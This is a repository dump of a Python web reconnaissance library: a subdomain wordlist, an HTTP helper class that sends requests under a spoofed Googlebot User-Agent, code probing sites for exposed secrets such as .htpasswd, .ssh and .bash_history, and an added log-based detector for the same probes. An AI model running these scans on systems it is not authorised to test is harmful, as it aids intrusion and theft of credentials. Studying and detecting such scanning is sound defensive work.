new 1086 | newhampshire 1087 | newjersey 1088 | newmexico 1089 | neworleans 1090 | news 1091 | newsfeed 1092 | newsfeeds 1093 | newsgroups 1094 | newton 1095 | newyork 1096 | newzealand 1097 | nf 1098 | ng 1099 | nh 1100 | ni 1101 | nigeria 1102 | nj 1103 | nl 1104 | nm 1105 | nms 1106 | nntp 1107 | no 1108 | node 1109 | nokia 1110 | nombres 1111 | nora 1112 | north 1113 | northcarolina 1114 | northdakota 1115 | northeast 1116 | northwest 1117 | noticias 1118 | novell 1119 | november 1120 | np 1121 | nr 1122 | ns 1123 | ns- 1124 | ns0 1125 | ns01 1126 | ns02 1127 | ns1 1128 | ns2 1129 | ns3 1130 | ns4 1131 | ns5 1132 | ns_ 1133 | nt 1134 | nt4 1135 | nt40 1136 | ntmail 1137 | ntp 1138 | ntserver 1139 | nu 1140 | null 1141 | nv 1142 | ny 1143 | nz 1144 | o 1145 | oakland 1146 | ocean 1147 | odin 1148 | office 1149 | offices 1150 | oh 1151 | ohio 1152 | ok 1153 | oklahoma 1154 | oklahomacity 1155 | old 1156 | 
om 1157 | omaha 1158 | omega 1159 | omicron 1160 | online 1161 | ontario 1162 | open 1163 | openbsd 1164 | openview 1165 | operations 1166 | ops 1167 | ops0 1168 | ops01 1169 | ops02 1170 | ops1 1171 | ops2 1172 | opsware 1173 | or 1174 | oracle 1175 | orange 1176 | order 1177 | orders 1178 | oregon 1179 | orion 1180 | orlando 1181 | oscar 1182 | out 1183 | outbound 1184 | outgoing 1185 | outlook 1186 | outside 1187 | ov 1188 | owa 1189 | owa01 1190 | owa02 1191 | owa1 1192 | owa2 1193 | ows 1194 | oxnard 1195 | p 1196 | pa 1197 | page 1198 | pager 1199 | pages 1200 | paginas 1201 | papa 1202 | paris 1203 | parners 1204 | partner 1205 | partners 1206 | patch 1207 | patches 1208 | paul 1209 | payroll 1210 | pbx 1211 | pc 1212 | pc01 1213 | pc1 1214 | pc10 1215 | pc101 1216 | pc11 1217 | pc12 1218 | pc13 1219 | pc14 1220 | pc15 1221 | pc16 1222 | pc17 1223 | pc18 1224 | pc19 1225 | pc2 1226 | pc20 1227 | pc21 1228 | pc22 1229 | pc23 1230 | pc24 1231 | pc25 1232 | pc26 1233 | pc27 1234 | pc28 1235 | pc29 1236 | pc3 1237 | pc30 1238 | pc31 1239 | pc32 1240 | pc33 1241 | pc34 1242 | pc35 1243 | pc36 1244 | pc37 1245 | pc38 1246 | pc39 1247 | pc4 1248 | pc40 1249 | pc41 1250 | pc42 1251 | pc43 1252 | pc44 1253 | pc45 1254 | pc46 1255 | pc47 1256 | pc48 1257 | pc49 1258 | pc5 1259 | pc50 1260 | pc51 1261 | pc52 1262 | pc53 1263 | pc54 1264 | pc55 1265 | pc56 1266 | pc57 1267 | pc58 1268 | pc59 1269 | pc6 1270 | pc60 1271 | pc7 1272 | pc8 1273 | pc9 1274 | pcmail 1275 | pda 1276 | pdc 1277 | pe 1278 | pegasus 1279 | pennsylvania 1280 | peoplesoft 1281 | personal 1282 | pf 1283 | pg 1284 | pgp 1285 | ph 1286 | phi 1287 | philadelphia 1288 | phoenix 1289 | phoeniz 1290 | phone 1291 | phones 1292 | photos 1293 | pi 1294 | pics 1295 | pictures 1296 | pink 1297 | pipex-gw 1298 | pittsburgh 1299 | pix 1300 | pk 1301 | pki 1302 | pl 1303 | plano 1304 | platinum 1305 | pluto 1306 | pm 1307 | pm1 1308 | pn 1309 | po 1310 | policy 1311 | polls 1312 | pop 1313 | pop3 1314 | portal 
1315 | portals 1316 | portfolio 1317 | portland 1318 | post 1319 | posta 1320 | posta01 1321 | posta02 1322 | posta03 1323 | postales 1324 | postoffice 1325 | ppp1 1326 | ppp10 1327 | ppp11 1328 | ppp12 1329 | ppp13 1330 | ppp14 1331 | ppp15 1332 | ppp16 1333 | ppp17 1334 | ppp18 1335 | ppp19 1336 | ppp2 1337 | ppp20 1338 | ppp21 1339 | ppp3 1340 | ppp4 1341 | ppp5 1342 | ppp6 1343 | ppp7 1344 | ppp8 1345 | ppp9 1346 | pptp 1347 | pr 1348 | prensa 1349 | press 1350 | print >> sys.stdout,er 1351 | print >> sys.stdout,serv 1352 | print >> sys.stdout,server 1353 | priv 1354 | privacy 1355 | private 1356 | problemtracker 1357 | products 1358 | profiles 1359 | project 1360 | projects 1361 | promo 1362 | proxy 1363 | prueba 1364 | pruebas 1365 | ps 1366 | psi 1367 | pss 1368 | pt 1369 | pub 1370 | public 1371 | pubs 1372 | purple 1373 | pw 1374 | py 1375 | q 1376 | qa 1377 | qmail 1378 | qotd 1379 | quake 1380 | quebec 1381 | queen 1382 | quotes 1383 | r 1384 | r01 1385 | r02 1386 | r1 1387 | r2 1388 | ra 1389 | radio 1390 | radius 1391 | rapidsite 1392 | raptor 1393 | ras 1394 | rc 1395 | rcs 1396 | rd 1397 | re 1398 | read 1399 | realserver 1400 | recruiting 1401 | red 1402 | redhat 1403 | ref 1404 | reference 1405 | reg 1406 | register 1407 | registro 1408 | registry 1409 | regs 1410 | relay 1411 | rem 1412 | remote 1413 | remstats 1414 | reports 1415 | research 1416 | reseller 1417 | reserved 1418 | resumenes 1419 | rho 1420 | rhodeisland 1421 | ri 1422 | ris 1423 | rmi 1424 | ro 1425 | robert 1426 | romeo 1427 | root 1428 | rose 1429 | route 1430 | router 1431 | router1 1432 | rs 1433 | rss 1434 | rtelnet 1435 | rtr 1436 | rtr01 1437 | rtr1 1438 | ru 1439 | rune 1440 | rw 1441 | rwhois 1442 | s 1443 | s1 1444 | s2 1445 | sa 1446 | sac 1447 | sacramento 1448 | sadmin 1449 | safe 1450 | sales 1451 | saltlake 1452 | sam 1453 | san 1454 | sanantonio 1455 | sandiego 1456 | sanfrancisco 1457 | sanjose 1458 | saskatchewan 1459 | saturn 1460 | sb 1461 | sbs 1462 | sc 1463 | 
scanner 1464 | schedules 1465 | scotland 1466 | scotty 1467 | sd 1468 | se 1469 | search 1470 | seattle 1471 | sec 1472 | secret 1473 | secure 1474 | secured 1475 | securid 1476 | security 1477 | sendmail 1478 | seri 1479 | serv 1480 | serv2 1481 | server 1482 | server1 1483 | servers 1484 | service 1485 | services 1486 | servicio 1487 | servidor 1488 | setup 1489 | sg 1490 | sh 1491 | shared 1492 | sharepoint 1493 | shareware 1494 | shipping 1495 | shop 1496 | shoppers 1497 | shopping 1498 | si 1499 | siebel 1500 | sierra 1501 | sigma 1502 | signin 1503 | signup 1504 | silver 1505 | sim 1506 | sirius 1507 | site 1508 | sj 1509 | sk 1510 | skywalker 1511 | sl 1512 | slackware 1513 | slmail 1514 | sm 1515 | smc 1516 | sms 1517 | smtp 1518 | smtphost 1519 | sn 1520 | sniffer 1521 | snmp 1522 | snmpd 1523 | snoopy 1524 | snort 1525 | so 1526 | socal 1527 | software 1528 | sol 1529 | solaris 1530 | solutions 1531 | soporte 1532 | source 1533 | sourcecode 1534 | sourcesafe 1535 | south 1536 | southcarolina 1537 | southdakota 1538 | southeast 1539 | southwest 1540 | spain 1541 | spam 1542 | spider 1543 | spiderman 1544 | splunk 1545 | spock 1546 | spokane 1547 | springfield 1548 | sprint >> sys.stdout, 1549 | sqa 1550 | sql 1551 | sql0 1552 | sql01 1553 | sql1 1554 | sql7 1555 | sqlserver 1556 | squid 1557 | sr 1558 | ss 1559 | ssh 1560 | ssl 1561 | ssl0 1562 | ssl01 1563 | ssl1 1564 | st 1565 | staff 1566 | stage 1567 | staging 1568 | start 1569 | stat 1570 | static 1571 | statistics 1572 | stats 1573 | stlouis 1574 | stock 1575 | storage 1576 | store 1577 | storefront 1578 | streaming 1579 | stronghold 1580 | strongmail 1581 | studio 1582 | submit 1583 | subversion 1584 | sun 1585 | sun0 1586 | sun01 1587 | sun02 1588 | sun1 1589 | sun2 1590 | superman 1591 | supplier 1592 | suppliers 1593 | support 1594 | sv 1595 | sw 1596 | sw0 1597 | sw01 1598 | sw1 1599 | sweden 1600 | switch 1601 | switzerland 1602 | sy 1603 | sybase 1604 | sydney 1605 | sysadmin 1606 | sysback 
1607 | syslog 1608 | syslogs 1609 | system 1610 | sz 1611 | t 1612 | tacoma 1613 | taiwan 1614 | talk 1615 | tampa 1616 | tango 1617 | tau 1618 | tc 1619 | tcl 1620 | td 1621 | team 1622 | tech 1623 | technology 1624 | techsupport 1625 | telephone 1626 | telephony 1627 | telnet 1628 | temp 1629 | tennessee 1630 | terminal 1631 | terminalserver 1632 | termserv 1633 | test 1634 | test2k 1635 | testbed 1636 | testing 1637 | testlab 1638 | testlinux 1639 | testo 1640 | testserver 1641 | testsite 1642 | testsql 1643 | testxp 1644 | texas 1645 | tf 1646 | tftp 1647 | tg 1648 | th 1649 | thailand 1650 | theta 1651 | thor 1652 | tienda 1653 | tiger 1654 | time 1655 | titan 1656 | tivoli 1657 | tj 1658 | tk 1659 | tm 1660 | tn 1661 | to 1662 | tokyo 1663 | toledo 1664 | tom 1665 | tool 1666 | tools 1667 | toplayer 1668 | toronto 1669 | tour 1670 | tp 1671 | tr 1672 | tracker 1673 | train 1674 | training 1675 | transfers 1676 | trinidad 1677 | trinity 1678 | ts 1679 | ts1 1680 | tt 1681 | tucson 1682 | tulsa 1683 | tumb 1684 | tumblr 1685 | tunnel 1686 | tv 1687 | tw 1688 | tx 1689 | tz 1690 | u 1691 | ua 1692 | uddi 1693 | ug 1694 | uk 1695 | um 1696 | uniform 1697 | union 1698 | unitedkingdom 1699 | unitedstates 1700 | unix 1701 | unixware 1702 | update 1703 | updates 1704 | upload 1705 | ups 1706 | upsilon 1707 | uranus 1708 | urchin 1709 | us 1710 | usa 1711 | usenet 1712 | user 1713 | users 1714 | ut 1715 | utah 1716 | utilities 1717 | uy 1718 | uz 1719 | v 1720 | va 1721 | vader 1722 | vantive 1723 | vault 1724 | vc 1725 | ve 1726 | vega 1727 | vegas 1728 | vend 1729 | vendors 1730 | venus 1731 | vermont 1732 | vg 1733 | vi 1734 | victor 1735 | video 1736 | videos 1737 | viking 1738 | violet 1739 | vip 1740 | virginia 1741 | vista 1742 | vm 1743 | vmserver 1744 | vmware 1745 | vn 1746 | vnc 1747 | voice 1748 | voicemail 1749 | voip 1750 | voyager 1751 | vpn 1752 | vpn0 1753 | vpn01 1754 | vpn02 1755 | vpn1 1756 | vpn2 1757 | vt 1758 | vu 1759 | w 1760 | w1 1761 | w2 
1762 | w3 1763 | wa 1764 | wais 1765 | wallet 1766 | wam 1767 | wan 1768 | wap 1769 | warehouse 1770 | washington 1771 | wc3 1772 | web 1773 | webaccess 1774 | webadmin 1775 | webalizer 1776 | webboard 1777 | webcache 1778 | webcam 1779 | webcast 1780 | webdev 1781 | webdocs 1782 | webfarm 1783 | webhelp 1784 | weblib 1785 | weblogic 1786 | webmail 1787 | webmaster 1788 | webproxy 1789 | webring 1790 | webs 1791 | webserv 1792 | webserver 1793 | webservices 1794 | website 1795 | websites 1796 | websphere 1797 | websrv 1798 | websrvr 1799 | webstats 1800 | webstore 1801 | websvr 1802 | webtrends 1803 | welcome 1804 | west 1805 | westvirginia 1806 | wf 1807 | whiskey 1808 | white 1809 | whois 1810 | wi 1811 | wichita 1812 | wiki 1813 | wililiam 1814 | win 1815 | win01 1816 | win02 1817 | win1 1818 | win2 1819 | win2000 1820 | win2003 1821 | win2k 1822 | win2k3 1823 | windows 1824 | windows01 1825 | windows02 1826 | windows1 1827 | windows2 1828 | windows2000 1829 | windows2003 1830 | windowsxp 1831 | wingate 1832 | winnt 1833 | winproxy 1834 | wins 1835 | winserve 1836 | winxp 1837 | wire 1838 | wireless 1839 | wisconsin 1840 | wlan 1841 | wordpress 1842 | work 1843 | world 1844 | write 1845 | ws 1846 | ws1 1847 | ws10 1848 | ws11 1849 | ws12 1850 | ws13 1851 | ws2 1852 | ws3 1853 | ws4 1854 | ws5 1855 | ws6 1856 | ws7 1857 | ws8 1858 | ws9 1859 | wusage 1860 | wv 1861 | ww 1862 | www 1863 | www- 1864 | www-01 1865 | www-02 1866 | www-1 1867 | www-2 1868 | www-int 1869 | www0 1870 | www01 1871 | www02 1872 | www1 1873 | www2 1874 | www3 1875 | www_ 1876 | wwwchat 1877 | wwwdev 1878 | wwwmail 1879 | wy 1880 | wyoming 1881 | x 1882 | x-ray 1883 | xi 1884 | xlogan 1885 | xmail 1886 | xml 1887 | xp 1888 | y 1889 | yankee 1890 | ye 1891 | yellow 1892 | young 1893 | yt 1894 | yu 1895 | z 1896 | z-log 1897 | za 1898 | zebra 1899 | zera 1900 | zeus 1901 | zlog 1902 | zm 1903 | zulu 1904 | zw 1905 | 
--------------------------------------------------------------------------------
/common.py:
--------------------------------------------------------------------------------
import httplib
import re
import sys
from time import sleep
from urllib import urlencode

__author__ = 'Beched'


class PyWebHack:
    allowed_params = ['host', 'ssl', 'ajax', 'cut', 'sleep', 'verbose', 'output']
    verbose = False
    log = ''
    cnt_reqs = 0
    known_urls = {}
    known_subs = []
    args = {}
    current_path = ''
    add_headers = {
        'Cookie': '',
        #'Accept' : 'text/html'
        'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
    }

    def __init__(self, *args, **kwargs):
        """
        The class constructor.
        :param host: a host to work with in format hostname[:port]. The only necessary parameter
        :param ssl: if True, HTTPS will be used, default value is 0
        :param ajax: if True, "X-Requested-With: XMLHttpRequest" header will be added to all HTTP requests
        :param cut: if set, all strings matching specified regexp will be removed from all HTTP responses
        :param sleep: if set, sleep after each HTTP request for the specified number of seconds, default value is 0
        :param verbose: if True, an output will be sent to self.output or to STDOUT, default value is 1
        :param output: the file for output, default is None
        :return:
        """
        # Give every instance its own mutable state; the class-level dicts and
        # lists above would otherwise be shared between all instances
        self.args = {}
        self.known_urls = {}
        self.known_subs = []
        self.add_headers = dict(self.add_headers)
        for k, v in kwargs.items():
            if k in self.allowed_params:
                self.args[k] = v
        # Set before the host check so that help() and __del__ are able to log
        self.verbose = self.args.get('verbose', 1)
        self.output = self.args.get('output', None)
        if 'host' not in self.args:
            self.help()
            return
        # Test the values, not the mere presence of the keys: ssl=0 means plain HTTP
        if self.args.get('ajax'):
            self.add_headers['X-Requested-With'] = 'XMLHttpRequest'
        self.sleep = float(self.args.get('sleep', 0))
        self.cut = self.args.get('cut', '')
        self.scheme = 'https' if self.args.get('ssl') else 'http'
        self.host = self.args['host']
        self.handler = httplib.HTTPSConnection(self.host) if self.scheme == 'https' else httplib.HTTPConnection(
            self.host)
        self.url = '%s://%s/' % (self.scheme, self.host)

    def __del__(self):
        """
        The class destructor. Outputs the total number of HTTP requests made
        """
        self.rep_log('==========\n%s requests made' % self.cnt_reqs)

    def rep_log(self, string, delim='\n'):
        """
        Logging method. If self.verbose is True, sends output to self.output or to STDOUT
        :param string: a log entry
        :param delim: a delimiter which is appended to the entry
        """
        try:
            self.known_urls[self.current_path]['info'] += string + delim
        except KeyError:
            # No structure has been created for the current path yet
            pass
        if self.verbose != 0:
            if self.output is not None:
                # Close the log file after each entry instead of leaking the handle
                with open(self.output, 'a+') as f:
                    f.write('%s%s' % (string, delim))
            else:
                sys.stdout.write('%s%s' % (string, delim))

    def newstructure(self):
        """
        Generates a dictionary for holding the information about some path
        :return: a dict with all necessary (empty) fields
        """
        return {
            'args': {'get': [], 'post': [], 'cookie': []},
            #'bugs': [],
            'info': '',
            'html': None,
            'code': None,
            'hdrs': {}
        }

    def restructure(self, path):
        """
        Sets current path and generates a new structure for it, if path is new
        :param path: current path
        """
        self.current_path = path
        if path not in self.known_urls:
            self.known_urls[path] = self.newstructure()

    def help(self):
        """
        A help method template. Called when invalid input is provided to the constructor
        """
        self.rep_log(
            '==========\nLibPyWebHack\n==========\nThis is a class constructor and it accepts parameters' +
            '%s. See docs for explanation.' % self.allowed_params)

    def makereq(self, path, query=None, headers=None, method='GET'):
        """
        The core method for sending HTTP requests
        :param path: a request URI (if it's directory, it should end with '/')
        :param query: a query string
        :param headers: a dict with additional request headers
        :param method: HTTP request method
        :return: a response tuple (str body, int code, dict headers)
        """
        sleep(self.sleep)
        headers = self.add_headers if headers is None else headers
        self.cnt_reqs += 1
        if isinstance(query, dict):
            query = urlencode(query)
        try:
            if query is not None:
                self.handler.request(method, path, query, headers)
            else:
                self.handler.request(method, path, headers=headers)
            resp = self.handler.getresponse()
            return (re.sub(self.cut, '', resp.read()), resp.status, {x: y for (x, y) in resp.getheaders()})
        except httplib.HTTPException:
            # Protocol error: reconnect and report an empty response.
            # The headers stay a dict so that callers can keep using .get()
            self.handler = httplib.HTTPSConnection(self.host) if self.scheme == 'https' else httplib.HTTPConnection(
                self.host)
            return ('', None, {})
        except Exception:
            self.rep_log('Could not connect to %s! Reason: %s' % (path, sys.exc_info()[1]))
            return ('', 0, {})

    def chkpath(self, paths, comment=None):
        """
        Check that the given paths exist. If some path exists, it's added to self.known_urls
        :param paths: a list with request URIs
        :param comment: a description of what's going on. Will be logged
        """
        for path in paths:
            self.rep_log('Checking for %s...' % ('/' + path if comment is None else comment))
            # The full URL (scheme://host/path) is sent as the request target
            r = self.makereq(self.url + path)
            if r[1] != 404:
                self.rep_log('Possibly (code %s) found at %s%s' % (r[1], self.url, path))
                self.known_urls.update({'/' + path: self.newstructure()})

--------------------------------------------------------------------------------
/libpywebhack.html:
--------------------------------------------------------------------------------
Python: module libpywebhack

libpywebhack
/home/beched/PycharmProjects/LibPyWebHack/libpywebhack.py

#-*- coding:utf-8 -*-

Modules
    httplib
    re
    socket
    sys
    threading

Classes
    common.PyWebHack
        WebHack

class WebHack(common.PyWebHack)
    Methods defined here:

    apachetest(self, path)
        Perform some security-specific information retrieval from Apache
        :param path: target path

    argsfind(self, path, modes=['get'], fill='1', base='bases/argsbase.txt', fix=[])
        Search for the input parameters of the web-scenario
        :param path: target path
        :param modes: list of the data transition methods ('get', 'post' or 'cookie')
        :param fill: the payload which should be plugged into parameters
        :param base: path to file with parameter names
        :param fix: fixed points, i.e. a list of parameters which should be sent in each request

    asptest(self, path)
        Search for some sensitive .NET-specific files
        :param path: target path

    brutesubs(self, threads=5, words='bases/wordlist2.txt', ban_codes=None, ban_regex=None)
        Multi-threaded brute force of existing subdomains of the given domain
        :param threads: number of threads
        :param words: path to file with subdomain names
        :param ban_codes: ignore subdomains which respond with these codes via HTTP
        :param ban_regex: ignore subdomains which respond with body matching this regular expression via HTTP

    dobrute(self, a, b)
        A worker-method for WebHack.brutesubs()
        :param a: beginning of interval
        :param b: end of interval

    domxsstest(self, path)
        Test if javascript-file matches some regular expressions, possibly indicating DOM XSS
        :param path: target path

    fuzzbackups(self, path)
        Search for source code backups of the script
        :param path: target path

    gpcreq(self, path, query='', mode='get')
        restructure(path)
        Send data via GET, POST request or in Cookie-header
        :param path: target path
        :param query: URL-encoded QUERY_STRING
        :param mode: 'get', 'post' or 'cookie'
        :return:

    iiscan(self, path)
        Tilde (~) and wildcard (*) file names brute force in IIS
        :param path: target path

    iistest(self, path)
        Search for sensitive IIS files, perform IIS files scanning, test access restriction bypass, test ASP.NET issues
        :param path: target path

    javatest(self, path)
        Hack Java
        :param path: target path

    minifuzz(self, path)
        Rapid fuzzing of known parameters
        :param path: target path

    nginxtest(self, path)
        Hack NginX
        :param path: target path

    phptest(self, path)
        Check for RCE, try to get PHP script path disclosure
        :param path: target path

    pytest(self, path)
        Hack Django
        :param path: target path

    rubytest(self, path)
        Retrieve information from HTTP headers, check for RoR object deserialization RCE
        :param path: target path

    softdetect(self, path)
        Extract information from HTTP headers, detects various platforms and searches for some files
        :param path: target path

    Methods inherited from common.PyWebHack:

    __del__(self)
        The class destructor. Outputs the total number of HTTP requests made

    __init__(self, *args, **kwargs)
        The class constructor.
        :param host: a host to work with in format hostname[:port]. The only necessary parameter
        :param ssl: if True, HTTPS will be used, default value is 0
        :param ajax: if True, "X-Requested-With: XMLHttpRequest" header will be added to all HTTP requests
        :param cut: if set, all strings matching specified regexp will be removed from all HTTP responses
        :param sleep: if set, sleep after each HTTP request for the specified number of seconds, default value is 0
        :param verbose: if True, an output will be sent to STDOUT, default value is 1
        :return:

    chkpath(self, paths, comment=None)
        Check that the given paths exist. If some path exists, it's added to self.known_urls
        :param paths: a list with request URIs
        :param comment: a description of what's going on. Will be logged

    help(self)
        A help method template. Called when invalid input is provided to the constructor

    makereq(self, path, query=None, headers=None, method='GET')
        The core method for sending HTTP requests
        :param path: a request URI (if it's directory, it should end with '/')
        :param query: a query string
        :param headers: a dict with additional request headers
        :param method: HTTP request method
        :return: a response tuple (str body, int code, dict headers)

    newstructure(self)
        Generates a dictionary for holding the information about some path
        :return: a dict with all necessary (empty) fields

    rep_log(self, string, delim='\n')
        Logging method. If self.verbose is True, sends output to STDOUT
        :param string: a log entry
        :param delim: a delimiter which is appended to the entry

    restructure(self, path)
        Sets current path and generates a new structure for it, if path is new
        :param path: current path

    Data and other attributes inherited from common.PyWebHack:

    add_headers = {'Cookie': '', 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
    allowed_params = ['host', 'ssl', 'ajax', 'cut', 'sleep', 'verbose']
    args = {}
    cnt_reqs = 0
    current_path = ''
    known_subs = []
    known_urls = {}
    log = ''
    verbose = False

Functions
    sleep(...)
        sleep(seconds)

        Delay execution for a given number of seconds.  The argument may be
        a floating point number for subsecond precision.

Data
    __author__ = 'Beched'

Author
    Beched
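
For defenders, the request pattern this library produces is easy to spot in a web server access log. The following is an added example, not part of the LibPyWebHack code base: it flags clients whose requests match the probe names used by `softdetect`, `iistest` and `apachetest` in libpywebhack.py, the NTFS `$INDEX_ALLOCATION` suffix, the absolute-form request target that `chkpath` produces by passing `self.url + path` to `makereq`, and the default Googlebot `User-Agent` from `add_headers`. The combined log format, the `MIN_PROBES` threshold, the function names and the sample log lines are assumptions made for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Names that softdetect(), iistest() and apachetest() request from the web root.
# sitemap.xml, robots.txt, crossdomain.xml and clientaccesspolicy.xml are left
# out because ordinary crawlers fetch them as well.
PROBE_NAMES = {
    'phpmyadmin', 'pma', 'myadmin', '.svn', '.ssh', '.git', 'CVS', 'info.php',
    'phpinfo.php', 'test.php', 'php.php', 'Thumbs.db', 'CHANGELOG', '.DS_Store',
    'composer.lock', 'composer.json', '.hg', '.hgignore', '.gitignore',
    'access.log', '.bash_history', '.bash_profile', '.htaccess', '.htpasswd',
    '.mysql_history', '.passwd', '.htconfig', '.htusers',
    'WEB-INF', 'META-INF', '_vti_bin', 'server-status', 'balancer-manager',
}
NTFS_STREAM = '$index_allocation'  # suffix appended by iistest()
MIN_PROBES = 5                     # assumption: threshold to tune per site

# Apache/nginx "combined" log format (assumed for this example)
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')


def classify(target):
    """Return (probe name or None, has NTFS stream suffix, is absolute-form)."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    name = path.strip('/').split('/')[0]
    return (name if name in PROBE_NAMES else None,
            NTFS_STREAM in path.lower(),
            bool(parts.scheme and parts.netloc))


def analyze(lines):
    """Group requests by client IP and return {ip: [reason, ...]} for suspects."""
    seen = defaultdict(lambda: {'probes': set(), 'ntfs': 0,
                                'absolute': 0, 'googlebot': False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        probe, ntfs, absolute = classify(m.group('target'))
        rec = seen[m.group('ip')]
        if probe:
            rec['probes'].add(probe)
        rec['ntfs'] += ntfs
        rec['absolute'] += absolute
        rec['googlebot'] |= 'Googlebot' in m.group('ua')

    findings = {}
    for ip, rec in seen.items():
        reasons = []
        if len(rec['probes']) >= MIN_PROBES:
            reasons.append('%d distinct sensitive-file probes' % len(rec['probes']))
        if rec['ntfs']:
            reasons.append('NTFS ::$INDEX_ALLOCATION request')
        # The next two signals only add context to a client that is already suspect
        if reasons and rec['absolute']:
            reasons.append('absolute-form request targets')
        if reasons and rec['googlebot']:
            reasons.append('probing under a Googlebot User-Agent')
        if reasons:
            findings[ip] = reasons
    return findings


# Constructed sample data: documentation-range IPs and a made-up host name
GB = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
FF = 'Mozilla/5.0 (X11; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0'


def _line(ip, target, status, ua):
    return ('%s - - [12/Mar/2024:10:00:00 +0000] "GET %s HTTP/1.1" %d 512 "-" "%s"'
            % (ip, target, status, ua))


SAMPLE_LOG = (
    [_line('203.0.113.7', 'http://shop.example/' + p, 404, GB)
     for p in ('robots.txt', '.git', '.svn', '.htpasswd', 'phpinfo.php',
               'composer.json', 'WEB-INF')]
    + [_line('203.0.113.7', '/::$INDEX_ALLOCATION', 404, GB),
       _line('198.51.100.20', '/robots.txt', 200, GB),    # crawler-like, no probes
       _line('198.51.100.20', '/products/42', 200, GB),
       _line('192.0.2.44', '/index.php', 200, FF),
       _line('192.0.2.44', '/.git', 404, FF)]             # single probe, below threshold
)

if __name__ == '__main__':
    for ip, reasons in analyze(SAMPLE_LOG).items():
        print(ip, '->', '; '.join(reasons))
```

The `User-Agent` is only a claim made by the client, so the Googlebot signal is reported as context for an already suspicious client rather than as a trigger on its own.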
--------------------------------------------------------------------------------
/libpywebhack.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-

import socket
import threading
from common import *

__author__ = 'Beched'


class WebHack(PyWebHack):
    def softdetect(self, path):
        """
        Extract information from HTTP headers, detects various platforms and searches for some files
        :param path: target path
        """
        self.restructure(path)
        self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.makereq(path)

        info = '==========\nRetrieving information from %s\nResponse code: %s\nDetected server: %s\nPowered by: %s\n' \
               'Headers influencing Caching: %s\nPowered by CMS: %s\nContent Location: %s\n=========='
        info = info % (
            path, self.known_urls[path]['code'], self.known_urls[path]['hdrs'].get('server', None),
            self.known_urls[path]['hdrs'].get('x-powered-by', None), self.known_urls[path]['hdrs'].get('vary', None),
            self.known_urls[path]['hdrs'].get('x-powered-cms', None),
            self.known_urls[path]['hdrs'].get('content-location', None))
        self.rep_log(info)
        # Well-known files and directories that are often left publicly accessible
        self.chkpath(
            ['sitemap.xml', 'robots.txt', 'crossdomain.xml', 'clientaccesspolicy.xml', 'phpmyadmin', 'pma', 'myadmin',
             '.svn', '.ssh', '.git', 'CVS', 'info.php', 'phpinfo.php', 'test.php', 'php.php', 'Thumbs.db', 'CHANGELOG',
             '.DS_Store', 'composer.lock', 'composer.json', '.hg', '.hgignore', '.gitignore', 'access.log', '.bash_history',
             '.bash_profile', '.htaccess', '.htpasswd', '.mysql_history', '.passwd', '.htconfig', '.htusers'])

        # Collect same-host links from the response body
        try:
            # The host name is escaped so that its dots are matched literally
            for link in re.findall('%s(/[^"\'>]*)["\'>]' % re.escape(self.host), self.known_urls[path]['html']):
                if link not in self.known_urls:
                    self.known_urls.update({link: self.newstructure()})
            for link in re.findall('(href|src)\s*?=\s*?["\']?([^"\'>]*)["\'>]', self.known_urls[path]['html']):
                # link is an (attribute, value) tuple; normalise the value before the lookup,
                # otherwise already known paths (including the current one) get overwritten
                url = link[1] if link[1].startswith('/') else '/' + link[1]
                if not link[1].startswith('http') and not link[1].startswith('//') and url not in self.known_urls:
                    self.known_urls.update({url: self.newstructure()})
        except:
            pass

        # Web server detection by the Server header
        try:
            if 'Apache' in self.known_urls[path]['hdrs'].get('server', None):
                self.rep_log('Apache server detected')
            elif 'nginx' in self.known_urls[path]['hdrs'].get('server', None):
                self.rep_log('NginX server detected')
            elif 'IIS' in self.known_urls[path]['hdrs'].get('server', None):
                self.rep_log('Microsoft IIS server detected')
        except TypeError:
            pass

        # Platform detection by file extension, headers, cookies and body markers
        if re.search('(\.php[^\w]?)', path.lower()) != None or 'PHP' in self.known_urls[path]['hdrs'].get(
                'x-powered-by', '') or 'PHP' in self.known_urls[path]['hdrs'].get('set-cookie', ''):
            self.rep_log('PHP detected')
        elif re.search('(\.aspx?[^\w]?)', path.lower()) != None or 'ASP.NET' in self.known_urls[path]['hdrs'].get(
                'x-powered-by', '') or (
                self.known_urls[path]['html'] != None and '__VIEWSTATE' in self.known_urls[path]['html']):
            self.rep_log('ASP.NET detected')
        elif re.search('(\.jsp[^\w]?)', path.lower()) != None or 'JSESSIONID' in self.known_urls[path]['hdrs'].get(
                'set-cookie', '') or re.search('(Servlet)|(JSP)',
                                               self.known_urls[path]['hdrs'].get('x-powered-by', '')) != None:
            self.rep_log('Java detected')
        elif self.known_urls[path]['html'] != None and 'csrfmiddlewaretoken' in self.known_urls[path]['html']:
            self.rep_log('Python (Django) detected')
        elif 'mod_rails' in self.known_urls[path]['hdrs'].get('x-powered-by', '') or self.known_urls[path]['hdrs'].get(
                'x-runtime', None) != None or self.known_urls[path]['hdrs'].get(
                'x-rack-cache', None) != None or self.makereq(path + '?a=a&a[]=a')[1] == 500:
            self.rep_log('Ruby on Rails or Rack server detected')

    def apachetest(self, path):
        """
        Perform some security-specific information retrieval from Apache
        :param path: target path
        """
        self.restructure(path)
        self.rep_log('==========\nTesting specific Apache issues')
        if not self.known_urls[path]['hdrs']:
            self.known_urls[path]['html'], self.known_urls[path]['code'], self.known_urls[path]['hdrs'] = self.makereq(
                path)
        try:
            # httplib returns header names in lower case, so look up 'vary' and 'alternates'
            vary = self.known_urls[path]['hdrs'].get('vary', None)
            if vary and re.search('(negotiate)', vary.lower()):
                self.rep_log('mod_negotiation possibly detected. Trying to get filename suggestions...')
                tmp_headers = self.add_headers.copy()
                tmp_headers['Negotiate'] = 'trans'
